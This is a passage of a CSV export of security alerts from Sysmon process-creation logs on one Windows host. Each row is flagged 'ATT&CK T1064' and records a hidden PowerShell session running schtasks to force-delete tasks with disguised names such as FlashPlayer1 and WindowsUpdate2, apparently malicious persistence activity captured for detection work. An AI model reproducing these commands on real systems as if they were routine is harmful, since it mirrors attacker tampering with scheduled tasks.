MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.620"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00104db12100}"",""processId"":""7272"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.572",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.587 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00109dae2100} +ProcessId: 4752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.590739300Z"",""eventRecordID"":""2807"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.587\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00109dae2100}\r\nProcessId: 4752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.587"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00109dae2100}"",""processId"":""4752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.557",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.555 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010dfab2100} +ProcessId: 4436 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.558394700Z"",""eventRecordID"":""2806"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.555\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010dfab2100}\r\nProcessId: 4436\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.555"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010dfab2100}"",""processId"":""4436"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.541",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.521 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001058a92100} +ProcessId: 1768 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.523962900Z"",""eventRecordID"":""2805"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.521\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001058a92100}\r\nProcessId: 1768\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.521"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001058a92100}"",""processId"":""1768"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.510",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.483 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001000a72100} +ProcessId: 3540 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.486212600Z"",""eventRecordID"":""2804"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.483\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001000a72100}\r\nProcessId: 3540\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.483"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001000a72100}"",""processId"":""3540"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.494",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.452 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001039a52100} +ProcessId: 6724 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.456020400Z"",""eventRecordID"":""2803"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.452\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001039a52100}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.452"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001039a52100}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.478",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.414 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00103da32100} +ProcessId: 3664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.418269500Z"",""eventRecordID"":""2802"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.414\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00103da32100}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 